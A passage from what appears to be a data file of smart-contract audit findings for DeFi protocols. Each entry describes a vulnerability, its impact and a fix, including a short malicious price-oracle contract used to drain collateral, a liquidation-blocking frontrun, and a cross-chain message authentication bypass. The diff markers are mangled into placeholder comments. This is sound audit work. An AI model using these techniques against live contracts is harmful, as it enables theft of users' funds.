revert in following scenario.\\n```\\nrequire((value == 0) || (token.allowance(address(this), spender) == 0), \\n\"SafeERC20: approve from non-zero to non-zero allowance\");\\n```\\n\\nSubmit method is doing `safeApproval` of Telcoin to referral contract. If referral contract do not use full allowance then subsequent call to `submit()` method will fails because of `SafeERC20: approve from non-zero to non-zero allowance`. `FeeBuyback` contract should not trust or assume that referral contract will use all allowance. If it does not use all allowance in `increaseClaimableBy()` method then `submit()` method will revert in next call. This vulnerability exists at two places in `submit()` method. Link given in code snippet section.чReset allowance to 0 before non-zero approval.\\n```\\n_telcoin.safeApprove(address(_referral), 0);\\n_telcoin.safeApprove(address(_referral), _telcoin.balanceOf(address(this)));\\n```\\nчSubmit() call will fail until referral contract do not use all allowance.ч```\\nrequire((value == 0) || (token.allowance(address(this), spender) == 0), \\n\"SafeERC20: approve from non-zero to non-zero allowance\");\\n```\\n -Missing input validation for _rewardProportion parameter allows keeper to escalate his privileges and pay back all loansчhighчThey are also able to choose how much yield token to swap and what the proportion of the resulting TAU is that is distributed to users vs. not distributed in order to erase bad debt.\\nSo a `keeper` is not trusted to perform any actions that go beyond swapping yield / performing liquidations.\\nHowever there is a missing input validation for the `_rewardProportion` parameter in the `SwapHandler.swapForTau` function. This allows a keeper to \"erase\" all debt of users. So users can withdraw their collateral without paying any of the debt.\\nBy looking at the code we can see that `_rewardProportion` is used to determine the amount of `TAU` that `_withholdTau` is called with: Link\\n```\\n_withholdTau((tauReturned * _rewardProportion) / Constants.PERCENT_PRECISION);\\n```\\n\\nAny value of `_rewardProportion` greater than `1e18` means that more `TAU` will be distributed to users than has been burnt (aka erasing debt).\\nIt is easy to see how the `keeper` can chose the number so big that `_withholdTau` is called with a value close to `type(uint256).max` which will certainly be enough to erase all debt.чI discussed this issue with the sponsor and it is intended that the `keeper` role can freely chose the value of the `_rewardProportion` parameter within the `[0,1e18]` range, i.e. 0%-100%.\\nTherefore the fix is to simply check that `_rewardProportion` is not bigger than 1e18:\\n```\\ndiff --git a/taurus-contracts/contracts/Vault/SwapHandler.sol b/taurus-contracts/contracts/Vault/SwapHandler.sol\\nindex c04e3a4..ab5064b 100644\\n--- a/taurus-contracts/contracts/Vault/SwapHandler.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/taurus-contracts/contracts/Vault/SwapHandler.sol\\n@@ -59,6 // Add the line below\\n59,10 @@ abstract contract SwapHandler is FeeMapping, TauDripFeed {\\n revert zeroAmount();\\n }\\n \\n// Add the line below\\n if (_rewardProportion > Constants.PERCENT_PRECISION) [\\n// Add the line below\\n revert invalidRewardProportion();\\n// Add the line below\\n ]\\n// Add the line below\\n\\n // Get and validate swap adapter address\\n address swapAdapterAddress = SwapAdapterRegistry(controller).swapAdapters(_swapAdapterHash);\\n if (swapAdapterAddress == address(0)) {\\n```\\nчA `keeper` can escalate his privileges and erase all debt. This means that `TAU` will not be backed by any collateral anymore and will be worthless.ч```\\n_withholdTau((tauReturned * _rewardProportion) / Constants.PERCENT_PRECISION);\\n```\\n -`swap()` will be reverted if `path` has more tokens.чmediumч`swap()` will be reverted if `path` has more tokens, the keepers will not be able to successfully call `swapForTau()`.\\nIn test/SwapAdapters/00_UniswapSwapAdapter.ts:\\n```\\n // Get generic swap parameters\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [\"0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\", \"0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\"],\\n [3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n\\nWe will get:\\n```\\n000000000000000000000000000000000000000000000000000000024f49cbca\\n0000000000000000000000000000000000000000000000056bc75e2d63100000\\n0000000000000000000000000000000000000000000000055de6a779bbac0000\\n0000000000000000000000000000000000000000000000000000000000000080\\n000000000000000000000000000000000000000000000000000000000000002b\\nyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy000bb8zzzzzzzzzzzzzzzzzz\\nzzzzzzzzzzzzzzzzzzzzzz000000000000000000000000000000000000000000\\n```\\n\\nThen the `swapOutputToken` is `_swapData[length - 41:length - 21]`.\\nBut if we have more tokens in path:\\n```\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [\"0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\", \"0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\", \"0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\"],\\n [3000, 3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n\\n```\\n000000000000000000000000000000000000000000000000000000024f49cbca\\n0000000000000000000000000000000000000000000000056bc75e2d63100000\\n0000000000000000000000000000000000000000000000055de6a779bbac0000\\n0000000000000000000000000000000000000000000000000000000000000080\\n0000000000000000000000000000000000000000000000000000000000000042\\nxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx000bb8yyyyyyyyyyyyyyyyyy\\nyyyyyyyyyyyyyyyyyyyyyy000bb8zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\\nzzzz000000000000000000000000000000000000000000000000000000000000\\n```\\n\\n`swapOutputToken` is `_swapData[length - 50:length - 30]`, the `swap()` function will be reverted.чLimit the swap pools, or check if the balance of `_outputToken` should exceed `_amountOutMinimum`.чThe keepers will not be able to successfully call `SwapHandler.swapForTau()`. Someone will get a reverted transaction if they misuse `UniswapSwapAdapter`.ч```\\n // Get generic swap parameters\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [\"0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\", \"0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\"],\\n [3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n -Mint limit is not reduced when the Vault is burning TAUчmediumчUpon burning TAU, it incorrectly updates the `currentMinted` when Vault is acting on behalf of users.\\nWhen the burn of `TAU` is performed, it calls `_decreaseCurrentMinted` to reduce the limit of tokens minted by the Vault:\\n```\\n function _decreaseCurrentMinted(address account, uint256 amount) internal virtual {\\n // If the burner is a vault, subtract burnt TAU from its currentMinted.\\n // This has a few highly unimportant edge cases which can generally be rectified by increasing the relevant vault's mintLimit.\\n uint256 accountMinted = currentMinted[account];\\n if (accountMinted >= amount) {\\n currentMinted[msg.sender] = accountMinted - amount;\\n }\\n }\\n```\\n\\nThe issue is that it subtracts `accountMinted` (which is currentMinted[account]) from `currentMinted[msg.sender]`. When the vault is burning tokens on behalf of the user, the `account` != `msg.sender` meaning the `currentMinted[account]` is 0, and thus the `currentMinted` of Vault will be reduced by 0 making it pretty useless.\\nAnother issue is that users can transfer their `TAU` between accounts, and then `amount > accountMinted` will not be triggered.чA simple solution would be to:\\n```\\n uint256 accountMinted = currentMinted[msg.sender];\\n```\\n\\nBut I suggest revisiting and rethinking this function altogether.ч`currentMinted` is incorrectly decreased upon burning so vaults do not get more space to mint new tokens.ч```\\n function _decreaseCurrentMinted(address account, uint256 amount) internal virtual {\\n // If the burner is a vault, subtract burnt TAU from its currentMinted.\\n // This has a few highly unimportant edge cases which can generally be rectified by increasing the relevant vault's mintLimit.\\n uint256 accountMinted = currentMinted[account];\\n if (accountMinted >= amount) {\\n currentMinted[msg.sender] = accountMinted - amount;\\n }\\n }\\n```\\n -Account can not be liquidated when price fall by 99%.чmediumчLiquidation fails when price fall by 99%.\\n`_calcLiquidation()` method has logic related to liquidations. This method calculate total liquidation discount, collateral to liquidate and liquidation surcharge. All these calculations looks okay in normal scenarios but there is an edge case when liquidation fails if price crashes by 99% or more. In such scenario `collateralToLiquidateWithoutDiscount` will be very large and calculated liquidation surcharge becomes greater than `collateralToLiquidate`\\n```\\nuint256 collateralToLiquidateWithoutDiscount = (_debtToLiquidate * (10 ** decimals)) / price;\\ncollateralToLiquidate = (collateralToLiquidateWithoutDiscount * totalLiquidationDiscount) / Constants.PRECISION;\\nif (collateralToLiquidate > _accountCollateral) {\\n collateralToLiquidate = _accountCollateral;\\n}\\nuint256 liquidationSurcharge = (collateralToLiquidateWithoutDiscount * LIQUIDATION_SURCHARGE) / Constants.PRECISION\\n```\\n\\nContract revert from below line hence liquidation will fail in this scenario.\\n```\\nuint256 collateralToLiquidator = collateralToLiquidate - liquidationSurcharge;\\n```\\nчPresently liquidation surcharge is calculated on `collateralToLiquidateWithoutDiscount`. Project team may want to reconsider this logic and calculate surcharge on `collateralToLiquidate` instead of `collateralToLiquidateWithoutDiscount`. This will be business decision but easy fix\\nAnother option is you may want to calculate surcharge on `Math.min(collateralToLiquidate, collateralToLiquidateWithoutDiscount)`.\\n```\\n uint256 collateralToTakeSurchargeOn = Math.min(collateralToLiquidate, collateralToLiquidateWithoutDiscount);\\n uint256 liquidationSurcharge = (collateralToTakeSurchargeOn * LIQUIDATION_SURCHARGE) / Constants.PRECISION;\\n return (collateralToLiquidate, liquidationSurcharge);\\n```\\nчLiquidation fails when price crash by 99% or more. Expected behaviour is that liquidation should be successful in all scenarios.ч```\\nuint256 collateralToLiquidateWithoutDiscount = (_debtToLiquidate * (10 ** decimals)) / price;\\ncollateralToLiquidate = (collateralToLiquidateWithoutDiscount * totalLiquidationDiscount) / Constants.PRECISION;\\nif (collateralToLiquidate > _accountCollateral) {\\n collateralToLiquidate = _accountCollateral;\\n}\\nuint256 liquidationSurcharge = (collateralToLiquidateWithoutDiscount * LIQUIDATION_SURCHARGE) / Constants.PRECISION\\n```\\n -Protocol is will not work on most of the supported blockchains due to hardcoded WETH contract address.чmediumчThe WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. While the project has integration tests with an ethereum mainnet RPC, they don't catch that on different chains like for example Polygon saveral functionallities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\nчThe WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.чProtocol will not work on most of the supported blockchains.ч```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n -A malicious admin can steal all users collateralчmediumчAccording to Taurus contest details, all roles, including the admin `Multisig`, should not be able to drain users collateral.\\n```\\n2. Multisig. Trusted with essentially everything but user collateral. \\n```\\n\\nAs shown of `updateWrapper()` function of `PriceOracleManager.sol`, the admin (onlyOwner) can update any price oracle `_wrapperAddress` for any `_underlying` collateral without any restrictions (such as timelock).\\n```\\nFile: taurus-contracts\\contracts\\Oracle\\PriceOracleManager.sol\\n function updateWrapper(address _underlying, address _wrapperAddress) external override onlyOwner {\\n if (!_wrapperAddress.isContract()) revert notContract();\\n if (wrapperAddressMap[_underlying] == address(0)) revert wrapperNotRegistered(_wrapperAddress);\\n\\n wrapperAddressMap[_underlying] = _wrapperAddress;\\n\\n emit WrapperUpdated(_underlying, _wrapperAddress);\\n }\\n```\\n\\nHence, admin can set a malicious price oracle like\\n```\\ncontract AttackOracleWrapper is IOracleWrapper, Ownable {\\n address public attacker;\\n IGLPManager public glpManager;\\n\\n constructor(address _attacker, address glp) {\\n attacker = _attacker;\\n glpManager = IGLPManager(glp);\\n }\\n\\n function getExternalPrice(\\n address _underlying,\\n bytes calldata _flags\\n ) external view returns (uint256 price, uint8 decimals, bool success) {\\n if (tx.origin == attacker) {\\n return (1, 18, true); // @audit a really low price resulting in the liquidation of all positions\\n } else {\\n uint256 price = glpManager.getPrice();\\n return (price, 18, true);\\n }\\n }\\n}\\n```\\n\\nThen call `liquidate()` to drain out users collateral with negligible $TAU cost.\\n```\\nFile: taurus-contracts\\contracts\\Vault\\BaseVault.sol\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n\\n // Check that collateral received is sufficient for liquidator\\n uint256 collateralToLiquidator = collateralToLiquidate - liquidationSurcharge;\\n if (collateralToLiquidator < (_debtAmount * _minExchangeRate) / Constants.PRECISION) {\\n revert insufficientCollateralLiquidated(_debtAmount, collateralToLiquidator);\\n }\\n\\n // Update user info\\n userDetails[_account].collateral = accDetails.collateral - collateralToLiquidate;\\n userDetails[_account].debt = accDetails.debt - _debtAmount;\\n\\n // Burn liquidator's Tau\\n TAU(tau).burnFrom(msg.sender, _debtAmount);\\n\\n // Transfer part of _debtAmount to liquidator and Taurus as fees for liquidation\\n IERC20(collateralToken).safeTransfer(msg.sender, collateralToLiquidator);\\n IERC20(collateralToken).safeTransfer(\\n Controller(controller).addressMapper(Constants.FEE_SPLITTER),\\n liquidationSurcharge\\n );\\n\\n emit AccountLiquidated(msg.sender, _account, collateralToLiquidate, liquidationSurcharge);\\n\\n return true;\\n }\\n```\\nчupdate of price oracle should be restricted with a `timelock`.чA malicious admin can steal all users collateralч```\\n2. Multisig. Trusted with essentially everything but user collateral. \\n```\\n -User can prevent liquidations by frontrunning the tx and slightly increasing their collateralчmediumчUser can prevent liquidations by frontrunning the tx and decreasing their debt so that the liquidation transaction reverts.\\nIn the liquidation transaction, the caller has to specify the amount of debt they want to liquidate, `_debtAmount`. The maximum value for that parameter is the total amount of debt the user holds:\\n```\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n```\\n\\nIn `_calcLiquidation()`, the contract determines how much collateral to liquidate when `_debtAmount` is paid by the caller. In that function, there's a check that reverts if the caller tries to liquidate more than they are allowed to depending on the position's health.\\n```\\n function _calcLiquidation(\\n uint256 _accountCollateral,\\n uint256 _accountDebt,\\n uint256 _debtToLiquidate\\n ) internal view returns (uint256 collateralToLiquidate, uint256 liquidationSurcharge) {\\n // // rest of code \\n \\n // Revert if requested liquidation amount is greater than allowed\\n if (\\n _debtToLiquidate >\\n _getMaxLiquidation(_accountCollateral, _accountDebt, price, decimals, totalLiquidationDiscount)\\n ) revert wrongLiquidationAmount();\\n```\\n\\nThe goal is to get that if-clause to evaluate to `true` so that the transaction reverts. To modify your position's health you have two possibilities: either you increase your collateral or decrease your debt. So instead of preventing the liquidation by pushing your position to a healthy state, you only modify it slightly so that the caller's liquidation transaction reverts.\\nGiven that Alice has:\\n100 TAU debt\\n100 Collateral (price = $1 so that collateralization rate is 1) Her position can be liquidated. The max value is:\\n```\\n function _getMaxLiquidation(\\n uint256 _collateral,\\n uint256 _debt,\\n uint256 _price,\\n uint8 _decimals,\\n uint256 _liquidationDiscount\\n ) internal pure returns (uint256 maxRepay) {\\n // Formula to find the liquidation amount is as follows\\n // [(collateral * price) - (liqDiscount * liqAmount)] / (debt - liqAmount) = max liq ratio\\n // Therefore\\n // liqAmount = [(max liq ratio * debt) - (collateral * price)] / (max liq ratio - liqDiscount)\\n maxRepay =\\n ((MAX_LIQ_COLL_RATIO * _debt) - ((_collateral * _price * Constants.PRECISION) / (10 ** _decimals))) /\\n (MAX_LIQ_COLL_RATIO - _liquidationDiscount);\\n\\n // Liquidators cannot repay more than the account's debt\\n if (maxRepay > _debt) {\\n maxRepay = _debt;\\n }\\n\\n return maxRepay;\\n }\\n```\\n\\n$(1.3e18 * 100e18 - (100e18 * 1e18 * 1e18) / 1e18) / 1.3e18 = 23.07e18$ (leave out liquidation discount for easier math)\\nThe liquidator will probably use the maximum amount they can liquidate and call `liquidate()` with `23.07e18`. Alice frontruns the liquidator's transaction and increases the collateral by `1`. That will change the max liquidation amount to: $(1.3e18 * 100e18 - 101e18 * 1e18) / 1.3e18 = 22.3e18$.\\nThat will cause `_calcLiquidation()` to revert because `23.07e18 > 22.3e18`.\\nThe actual amount of collateral to add or debt to decrease depends on the liquidation transaction. But, generally, you would expect the liquidator to liquidate as much as possible. Thus, you only have to slightly move the position to cause their transaction to revertчIn `_calcLiquidation()` the function shouldn't revert if _debtToLiqudiate > `_getMaxLiquidation()`. Instead, just continue with the value `_getMaxLiquidation()` returns.чUser can prevent liquidations by slightly modifying their position without putting it at a healthy state.ч```\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n```\\n -Cross-chain message authentication can be bypassed, allowing an attacker to disrupt the state of vaultsчhighчA malicious actor may send a cross-chain message to an `XProvider` contract and bypass the `onlySource` authentication check. As a result, they'll be able to call any function in the `XProvider` contract that has the `onlySource` modifier and disrupt the state of `XChainController` and all vaults.\\nThe protocol integrates with Connext to handle cross-chain interactions. `XProvider` is a contract that manages interactions between vaults deployed on all supported networks and `XChainController`. `XProvider` is deployed on each of the network where a vault is deployed and is used to send and receive cross-chain messages via Connext. `XProvider` is a core contract that handles vault rebalancing, transferring of allocations from Game to `XChainController` and to vaults, transferring of tokens deposited to vaults between vault on different networks. Thus, it's critical that the functions of this contract are only called by authorized actors.\\nTo ensure that cross-chain messages are sent from authorized actors, there's onlySource modifier that's applied to the xReceive function. The modifier checks that the sender of a message is trusted:\\n```\\nmodifier onlySource(address _originSender, uint32 _origin) {\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, \"Not trusted\");\\n _;\\n}\\n```\\n\\nHowever, it doesn't check that `trustedRemoteConnext[_origin]` is set (i.e. it's not the zero address), and `_originSender` can in fact be the zero address.\\nIn Connext, a message can be delivered via one of the two paths: the fast path or the slow path. The fast path is taken when, on the destination, message receiving is not authentication, i.e. when destination allows receiving of messages from all senders. The slow path is taken when message receiving on the destination is authenticated, i.e. destination allows any sender (it doesn't check a sender).\\nSince, `XProvider` always checks the sender of a message, only the slow path will be used by Connext to deliver messages to it. However, Connext always tries the slow path:\\nRouters observing the origin chain with funds on the destination chain will: Simulate the transaction (if this fails, the assumption is that this is a more \"expressive\" crosschain message that requires authentication and so must go through the AMB: the slow path).\\nI.e. it'll always send a message and see if it reverts on the destination or not: if it does, Connext will switch to the slow path.\\nWhen Connext executes a message on the destination chain in the fast path, it sets the sender address to the zero address:\\n```\\n(bool success, bytes memory returnData) = ExcessivelySafeCall.excessivelySafeCall(\\n _params.to,\\n gasleft() - Constants.EXECUTE_CALLDATA_RESERVE_GAS,\\n 0, // native asset value (always 0)\\n Constants.DEFAULT_COPY_BYTES, // only copy 256 bytes back as calldata\\n abi.encodeWithSelector(\\n IXReceiver.xReceive.selector,\\n _transferId,\\n _amount,\\n _asset,\\n _reconciled ? _params.originSender : address(0), // use passed in value iff authenticated\\n _params.originDomain,\\n _params.callData\\n )\\n);\\n```\\n\\nThus, Connext will try to call the `XProvider.xReceive` function with the `_originSender` argument set to the zero address. And there are situations when the `onlySource` modifier will pass such calls: when the origin network (as specified by the `_origin` argument) is not in the `trustedRemoteConnext` mapping.\\nAccording to the description of the project, it'll be deployed on the following networks:\\nMainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain\\nAnd this is the list of networks supported by Connext:\\nEthereum Mainnet Polygon Optimism Arbitrum One Gnosis Chain BNB Chain\\nThus, a malicious actor can send a message from Gnosis Chain (it's not supported by Derby), and the `onlySource` modifier will pass the message. The same is true for any new network supported by Connext in the future and not supported by Derby.чIn the `onlySource` modifier, consider checking that `trustedRemoteConnext[_origin]` doesn't return the zero address:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\nindex 6074fa0..f508a7c 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\n@@ // Remove the line below\\n83,7 // Add the line below\\n83,7 @@ contract XProvider is IXReceiver {\\n * 3) The call to this contract comes from Connext.\\n */\\n modifier onlySource(address _originSender, uint32 _origin) {\\n// Remove the line below\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, \"Not trusted\");\\n// Add the line below\\n require(trustedRemoteConnext[_origin] != address(0) && _originSender == trustedRemoteConnext[_origin] && msg.sender == connext, \"Not trusted\");\\n _;\\n }\\n```\\nчA malicious actor can call `XProvider.xReceive` and any functions of `XProvider` with the `onlySelf` modifier:\\nxReceive allow the caller to call any public function of `XProvider`, but only the ones with the `onlySelf` modifier are authorized;\\nreceiveAllocations can be used to corrupt allocations in the `XChainController` (i.e. allocate all tokens only to the protocol the attacker will benefit the most from);\\nreceiveTotalUnderlying can be used to set wrong \"total underlying\" value in the `XChainController` and block rebalancing of vaults (due to an underflow or another arithmetical error);\\nreceiveSetXChainAllocation can be used to set an exchange rate that will allow an attacker to drain a vault by redeeming their LP tokens at a higher rate;\\nreceiveFeedbackToXController can be used to trick the `XChainController` into skipping receiving of funds from a vault;\\nreceiveProtocolAllocationsToVault can be used by an attacker to unilaterally set allocations in a vault, directing funds only to protocol the attacker will benefit from;\\nreceiveRewardsToGame can be used by an attacker to increase the reward per LP token in a protocol the attacker deposited to;\\nfinally, receiveStateFeedbackToVault can allow an attacker to switch off a vault and exclude it from rebalancing.ч```\\nmodifier onlySource(address _originSender, uint32 _origin) {\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, \"Not trusted\");\\n _;\\n}\\n```\\n -Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.чhighчCertain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 30 = 0.3%)\\n bytes(\"\") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.чProvide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.чAn attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.ч```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n -maxTrainingDeposit can be bypassedчmediumчIt was observed that User can bypass the `maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if User balance exceeds maxTrainingDeposit then request fails (considering training is true)\\nLets say User A has balance of 50 and maxTrainingDeposit is 100\\nIf User A deposit amount 51 then it fails since 50+51<=100 is false\\nSo User A transfer amount 50 to his another account\\nNow when User A deposit, it does not fail since `0+51<=100`чIf user specific limit is required then transfer should be check below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\nчUser can bypass maxTrainingDeposit and deposit more than allowedч```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n -MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFundsчmediumчMainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFundswill not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, aslo amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that next situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController(vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens(between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > 